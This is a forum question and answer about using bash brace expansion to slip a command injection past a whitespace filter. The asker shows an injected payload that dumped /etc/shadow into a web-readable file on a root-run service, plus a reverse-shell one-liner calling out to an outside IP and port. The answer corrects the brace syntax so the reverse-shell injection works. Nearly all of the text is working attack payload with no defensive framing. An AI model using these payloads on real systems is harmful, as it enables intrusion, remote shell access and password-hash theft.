# Command injection with brace expansion

Tags: web-application, network, linux, bash

Does anyone have more experience with bash brace expansions when dealing with command injections that filters whitespaces?

I am encountering most likely not a filtering engine, but an bad parsing engine which has an command injection vulnerability as it is parsed to an system call.

I have successfully been able to write out
`/etc/shadow`:

```
-w=target.cap;{cat,/etc/shadow}>>/var/www/passnew.txt
```

Which succeeded without further issues. The service is running as root as well.

At the moment I am trying to do an reverse shell with brace expansion, but I am encountering difficulties upon formatting the following one liner payload:

```
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
```

To

```
-w=target.cap;{bash,-i}>&{/dev/tcp/ipredacted/8080{0>&1}
```

I have tried more ways than this, but I am stuck.

Comment: Do you understand how brace expansion works? `-w=target.cap;{bash,-i}>&{/dev/tcp/ipredacted/8080{0>&1}` is clearly wrong, one of the braces is never closed.

Answer (score 1):

Change the last `{` to a `,`

> -w=target.cap;{bash,-i}>&{/dev/tcp/ipredacted/8080,0>&1}